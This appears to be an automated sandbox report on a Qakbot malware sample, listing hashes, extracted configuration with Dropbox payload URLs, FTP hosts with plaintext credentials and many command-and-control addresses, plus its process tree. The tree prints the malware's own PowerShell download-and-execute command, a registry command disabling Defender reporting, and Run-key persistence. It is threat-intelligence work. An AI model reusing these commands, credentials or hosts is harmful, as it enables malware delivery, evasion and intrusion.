Analysis
-
max time kernel
148s -
max time network
113s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
14-07-2022 03:44
Static task
static1
Behavioral task
behavioral1
Sample
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
Resource
win10v2004-20220414-en
General
-
Target
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
-
Size
616KB
-
MD5
adab2a637738b6780e74b74dcabbb96f
-
SHA1
0614b295d8f8486ea42c89be35b3e44926a943c0
-
SHA256
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4
-
SHA512
72d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d
Malware Config
Extracted
https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1
https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1
Extracted
qakbot
322.368
1532427880
Protocol: ftp- Host:
37.60.244.211 - Port:
21 - Username:
[email protected] - Password:
4AsEzIaMwi2d
Protocol: ftp- Host:
198.38.77.162 - Port:
21 - Username:
[email protected] - Password:
kJm6DKVPfyiv
Protocol: ftp- Host:
61.221.12.26 - Port:
21 - Username:
[email protected] - Password:
346HZGCMlwecz9S
Protocol: ftp- Host:
67.222.137.18 - Port:
21 - Username:
[email protected] - Password:
p4a8k6fE1FtA3pR
Protocol: ftp- Host:
107.6.152.61 - Port:
21 - Username:
[email protected] - Password:
RoP4Af0RKAAQ74V
216.218.74.196:443
185.219.83.73:443
50.198.141.161:2078
70.118.18.242:443
68.113.142.24:465
72.193.162.108:443
98.225.141.232:443
216.201.159.118:443
73.130.229.200:443
76.73.202.82:443
67.197.97.144:443
71.77.22.206:443
47.40.29.239:443
65.116.179.83:443
96.248.15.254:995
47.134.236.166:443
173.81.42.136:20
73.106.122.121:443
98.103.2.226:443
181.93.205.181:443
75.189.235.216:443
74.88.210.56:995
24.100.46.201:2222
24.228.185.224:2222
24.11.50.136:443
184.180.157.203:2222
68.173.55.51:443
68.49.120.179:443
76.169.73.234:443
216.21.168.27:32101
75.127.141.50:995
50.42.189.206:993
70.169.12.141:443
93.108.180.227:443
98.16.70.197:2222
71.210.153.133:443
105.227.20.203:443
73.40.24.158:443
24.163.66.146:443
173.248.24.230:443
216.21.168.27:995
174.48.72.160:443
47.223.89.43:443
68.129.231.84:443
190.185.219.110:443
67.83.122.112:2222
97.97.160.42:443
207.178.109.161:443
71.190.202.120:443
99.197.182.183:443
24.6.31.163:443
174.84.12.107:443
73.152.213.187:80
97.84.210.38:2222
68.59.209.183:995
98.243.166.148:443
172.119.71.75:995
150.200.247.87:443
72.179.39.89:443
67.76.36.112:443
174.109.117.152:443
73.52.101.153:80
72.174.25.139:443
173.70.44.171:443
70.21.182.149:2222
189.175.149.128:443
68.206.135.146:443
216.21.168.27:50000
50.32.243.36:443
24.141.179.121:443
68.32.58.9:443
173.80.75.177:443
174.124.227.84:443
47.48.236.98:2222
24.175.103.122:995
24.209.130.208:443
24.252.80.93:443
96.73.55.193:993
75.109.193.173:1194
75.109.193.173:2087
75.109.193.173:8443
70.182.79.66:443
97.70.85.248:443
65.191.74.248:443
65.40.207.151:995
68.207.43.173:443
66.189.228.49:995
73.183.145.218:2222
209.213.24.194:443
71.213.173.77:61200
67.197.104.90:443
68.207.33.242:443
172.87.188.2:443
204.85.12.25:443
68.226.136.96:443
174.235.3.127:443
104.153.240.6:2222
24.180.246.147:443
24.93.104.154:443
75.106.233.194:443
65.191.128.99:443
66.227.135.213:443
65.169.66.123:2222
68.206.131.246:443
71.172.250.114:443
67.55.174.194:443
107.15.153.110:8443
204.133.181.227:443
47.221.46.163:443
71.48.218.91:995
73.74.72.141:443
71.85.72.9:443
96.32.171.132:443
172.164.17.102:443
173.191.238.124:995
47.186.93.228:443
68.228.118.130:32100
209.180.154.97:995
68.133.47.150:443
75.189.239.153:443
204.85.12.26:443
76.101.165.66:443
97.84.166.64:443
173.160.3.209:443
72.133.75.134:443
68.207.45.236:443
67.181.17.143:443
79.166.125.245:443
24.180.246.147:465
71.77.128.23:443
73.58.60.60:443
63.79.135.0:443
50.111.32.211:443
208.104.163.142:443
68.207.33.232:2222
204.210.158.207:465
73.152.213.47:443
172.116.138.154:995
96.85.138.153:443
68.207.48.22:443
174.48.211.60:443
24.42.164.2:2222
71.210.16.7:443
108.35.23.218:443
71.33.167.143:995
68.189.161.115:443
24.180.246.147:995
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 5 1172 powershell.exe 6 1172 powershell.exe 7 1172 powershell.exe 8 1172 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
crzupte.execrzupte.exepid process 1724 crzupte.exe 1196 crzupte.exe -
Loads dropped DLL 2 IoCs
Processes:
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exepid process 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Windows\CurrentVersion\Run\cnbbfsg = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Crzupter\\crzupte.exe\"" explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 32 IoCs
Processes:
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.execrzupte.exepowershell.execrzupte.exeexplorer.exetaskhost.exeDwm.exeExplorer.EXEcmd.execonhost.exePING.EXEpid process 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe 1664 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe 1664 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe 1724 crzupte.exe 1172 powershell.exe 1196 crzupte.exe 1196 crzupte.exe 1948 explorer.exe 1948 explorer.exe 1128 taskhost.exe 1220 Dwm.exe 1268 Explorer.EXE 1312 cmd.exe 308 conhost.exe 1316 PING.EXE 1948 explorer.exe 1948 explorer.exe 1948 explorer.exe 1948 explorer.exe 1948 explorer.exe 1948 explorer.exe 1948 explorer.exe 1948 explorer.exe 1948 explorer.exe 1948 explorer.exe 1948 explorer.exe 1948 explorer.exe 1948 explorer.exe 1948 explorer.exe 1948 explorer.exe 1948 explorer.exe 1948 explorer.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
crzupte.exepid process 1724 crzupte.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1172 powershell.exe -
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.execrzupte.execmd.exeexplorer.exedescription pid process target process PID 892 wrote to memory of 1664 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe PID 892 wrote to memory of 1664 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe PID 892 wrote to memory of 1664 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe PID 892 wrote to memory of 1664 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe PID 892 wrote to memory of 1724 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe crzupte.exe PID 892 wrote to memory of 1724 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe crzupte.exe PID 892 wrote to memory of 1724 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe crzupte.exe PID 892 wrote to memory of 1724 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe crzupte.exe PID 892 wrote to memory of 548 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe reg.exe PID 892 wrote to memory of 548 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe reg.exe PID 892 wrote to memory of 548 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe reg.exe PID 892 wrote to memory of 548 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe reg.exe PID 892 wrote to memory of 1172 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe powershell.exe PID 892 wrote to memory of 1172 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe powershell.exe PID 892 wrote to memory of 1172 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe powershell.exe PID 892 wrote to memory of 1172 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe powershell.exe PID 1724 wrote to memory of 1196 1724 crzupte.exe crzupte.exe PID 1724 wrote to memory of 1196 1724 crzupte.exe crzupte.exe PID 1724 wrote to memory of 1196 1724 crzupte.exe crzupte.exe PID 1724 wrote to memory of 1196 1724 crzupte.exe crzupte.exe PID 1724 wrote to memory of 1948 1724 crzupte.exe explorer.exe PID 1724 wrote to memory of 1948 1724 crzupte.exe explorer.exe PID 1724 wrote to memory of 1948 1724 crzupte.exe explorer.exe PID 1724 wrote to memory of 1948 1724 crzupte.exe explorer.exe PID 1724 wrote to memory of 1948 1724 crzupte.exe explorer.exe PID 892 wrote to memory of 1312 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe cmd.exe PID 892 wrote to memory of 1312 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe cmd.exe PID 892 wrote to memory of 1312 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe cmd.exe PID 892 wrote to memory of 1312 892 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe cmd.exe PID 1312 wrote to memory of 1316 1312 cmd.exe PING.EXE PID 1312 wrote to memory of 1316 1312 cmd.exe PING.EXE PID 1312 wrote to memory of 1316 1312 cmd.exe PING.EXE PID 1312 wrote to memory of 1316 1312 cmd.exe PING.EXE PID 1948 wrote to memory of 1128 1948 explorer.exe taskhost.exe PID 1948 wrote to memory of 1128 1948 explorer.exe taskhost.exe PID 1948 wrote to memory of 1128 1948 explorer.exe taskhost.exe PID 1948 wrote to memory of 1220 1948 explorer.exe Dwm.exe PID 1948 wrote to memory of 1220 1948 explorer.exe Dwm.exe PID 1948 wrote to memory of 1220 1948 explorer.exe Dwm.exe PID 1948 wrote to memory of 1268 1948 explorer.exe Explorer.EXE PID 1948 wrote to memory of 1268 1948 explorer.exe Explorer.EXE PID 1948 wrote to memory of 1268 1948 explorer.exe Explorer.EXE PID 1948 wrote to memory of 1312 1948 explorer.exe cmd.exe PID 1948 wrote to memory of 1312 1948 explorer.exe cmd.exe PID 1948 wrote to memory of 1312 1948 explorer.exe cmd.exe PID 1948 wrote to memory of 308 1948 explorer.exe conhost.exe PID 1948 wrote to memory of 308 1948 explorer.exe conhost.exe PID 1948 wrote to memory of 308 1948 explorer.exe conhost.exe PID 1948 wrote to memory of 1316 1948 explorer.exe PING.EXE PID 1948 wrote to memory of 1316 1948 explorer.exe PING.EXE PID 1948 wrote to memory of 1316 1948 explorer.exe PING.EXE
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe"C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe"2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe"C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe" /C3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupte.exeC:\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupte.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupte.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupte.exe" /C4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\ipdthpqrndvsmqnttfgguuqmj.txt'"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping.exe -n 6 127.0.0.14⤵
- Runs ping.exe
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-13846247831516998300-11375854551824567666-1445500240151860539714287427401005606822"1⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupt.datFilesize
92B
MD5c8c163765674940da66be2b8e7449697
SHA186d26dac42b5bfb68ed992bbbead59cc5890803e
SHA2567a32b89b011cd130e41d6f9f9d3bdc7fd79cbb7d5667ec39e42a326d35383596
SHA512f5fdb504cfb74942c6f0433fceefa565458f62b9f9bb481372af87598f2d150cb2881e493bce09f235e233bbd47e8978956eb981c08a71d2ae39dc7d25670dd7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupte.exeFilesize
616KB
MD5adab2a637738b6780e74b74dcabbb96f
SHA10614b295d8f8486ea42c89be35b3e44926a943c0
SHA2564845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4
SHA51272d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupte.exeFilesize
616KB
MD5adab2a637738b6780e74b74dcabbb96f
SHA10614b295d8f8486ea42c89be35b3e44926a943c0
SHA2564845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4
SHA51272d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupte.exeFilesize
616KB
MD5adab2a637738b6780e74b74dcabbb96f
SHA10614b295d8f8486ea42c89be35b3e44926a943c0
SHA2564845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4
SHA51272d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d
-
\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupte.exeFilesize
616KB
MD5adab2a637738b6780e74b74dcabbb96f
SHA10614b295d8f8486ea42c89be35b3e44926a943c0
SHA2564845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4
SHA51272d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d
-
\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupte.exeFilesize
616KB
MD5adab2a637738b6780e74b74dcabbb96f
SHA10614b295d8f8486ea42c89be35b3e44926a943c0
SHA2564845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4
SHA51272d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d
-
memory/308-139-0x0000000001BC0000-0x0000000001BEC000-memory.dmpFilesize
176KB
-
memory/308-131-0x0000000001BC0000-0x0000000001BEC000-memory.dmpFilesize
176KB
-
memory/548-77-0x0000000000000000-mapping.dmp
-
memory/892-55-0x0000000000400000-0x000000000049E000-memory.dmpFilesize
632KB
-
memory/892-59-0x00000000001D0000-0x00000000001D6000-memory.dmpFilesize
24KB
-
memory/892-54-0x00000000755C1000-0x00000000755C3000-memory.dmpFilesize
8KB
-
memory/1128-114-0x0000000001D20000-0x0000000001D4C000-memory.dmpFilesize
176KB
-
memory/1128-105-0x0000000001D20000-0x0000000001D4C000-memory.dmpFilesize
176KB
-
memory/1128-107-0x0000000001D50000-0x0000000001D7D000-memory.dmpFilesize
180KB
-
memory/1172-78-0x0000000000000000-mapping.dmp
-
memory/1172-97-0x000000000275B000-0x000000000277A000-memory.dmpFilesize
124KB
-
memory/1172-84-0x000000000275B000-0x000000000277A000-memory.dmpFilesize
124KB
-
memory/1172-82-0x0000000002754000-0x0000000002757000-memory.dmpFilesize
12KB
-
memory/1172-79-0x000007FEFBAF1000-0x000007FEFBAF3000-memory.dmpFilesize
8KB
-
memory/1172-81-0x000007FEF35E0000-0x000007FEF413D000-memory.dmpFilesize
11.4MB
-
memory/1172-83-0x000000001B6F0000-0x000000001B9EF000-memory.dmpFilesize
3.0MB
-
memory/1172-93-0x0000000002754000-0x0000000002757000-memory.dmpFilesize
12KB
-
memory/1172-95-0x000000000275B000-0x000000000277A000-memory.dmpFilesize
124KB
-
memory/1172-96-0x0000000002754000-0x0000000002757000-memory.dmpFilesize
12KB
-
memory/1172-80-0x000007FEF4140000-0x000007FEF4B63000-memory.dmpFilesize
10.1MB
-
memory/1196-94-0x00000000002E0000-0x00000000002E6000-memory.dmpFilesize
24KB
-
memory/1196-86-0x0000000000000000-mapping.dmp
-
memory/1220-140-0x0000000001C60000-0x0000000001C8C000-memory.dmpFilesize
176KB
-
memory/1220-115-0x0000000001C60000-0x0000000001C8C000-memory.dmpFilesize
176KB
-
memory/1268-120-0x00000000029D0000-0x00000000029FC000-memory.dmpFilesize
176KB
-
memory/1312-101-0x0000000000000000-mapping.dmp
-
memory/1312-121-0x0000000000110000-0x0000000000138000-memory.dmpFilesize
160KB
-
memory/1312-123-0x0000000000140000-0x0000000000169000-memory.dmpFilesize
164KB
-
memory/1312-130-0x0000000000110000-0x0000000000138000-memory.dmpFilesize
160KB
-
memory/1316-102-0x0000000000000000-mapping.dmp
-
memory/1316-137-0x0000000000210000-0x0000000000238000-memory.dmpFilesize
160KB
-
memory/1664-66-0x0000000000240000-0x0000000000246000-memory.dmpFilesize
24KB
-
memory/1664-60-0x0000000000000000-mapping.dmp
-
memory/1724-76-0x0000000000230000-0x0000000000236000-memory.dmpFilesize
24KB
-
memory/1724-69-0x0000000000000000-mapping.dmp
-
memory/1948-113-0x0000000000230000-0x000000000025F000-memory.dmpFilesize
188KB
-
memory/1948-100-0x0000000074351000-0x0000000074353000-memory.dmpFilesize
8KB
-
memory/1948-138-0x0000000000080000-0x00000000000E9000-memory.dmpFilesize
420KB
-
memory/1948-103-0x0000000000080000-0x00000000000E9000-memory.dmpFilesize
420KB
-
memory/1948-98-0x0000000000000000-mapping.dmp